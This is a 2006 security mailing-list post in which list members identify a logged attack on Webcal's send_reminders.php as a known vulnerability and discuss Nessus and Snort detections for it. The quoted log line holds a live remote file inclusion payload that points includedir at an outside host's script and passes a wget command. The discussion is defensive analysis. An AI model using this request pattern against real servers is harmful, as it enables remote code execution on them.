[Dshield] Webcal Exploit?

George A. Theall theall at tifaware.com
Tue Feb 7 11:51:36 GMT 2006


On Mon, Feb 06, 2006 at 05:52:38PM -0600, Frank Knobbe wrote:
> On Mon, 2006-02-06 at 14:35 -0500, George A. Theall wrote:
> > > 81.95.106.181 - - [05/Feb/2006:12:36:47 -0500] "GET
> > > http://68.236.166.73/Webcal42/tools/send_reminders.php?includedir=http://www.58club.net/bbs/xpl/cse.gif?&cmd=wget
> > > HTTP/1.0" 302 290
> > 
> > Yes, that's from BID 14651.  I wrote a Nessus plugin for that last
> > August:
> 
> I see your August and raise you March. Seems like we had a BleedingSnort
> rule for this at least since March 2005.
> http://www.bleedingsnort.com/cgi-bin/viewcvs.cgi/sigs/WEB/WEB_PHP_Injection?view=markup

As I'm sure you're aware, this rule is a general one for PHP code
injection, not a check for this specific vulnerability. And if it
fires and represents a successful request, you're likely 0wn3d.


George
-- 
theall at tifaware.com
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 189 bytes
Desc: not available
Url : http://www.dshield.org/pipermail/list/attachments/20060207/dd5b1d3f/attachment.bin


More information about the list mailing list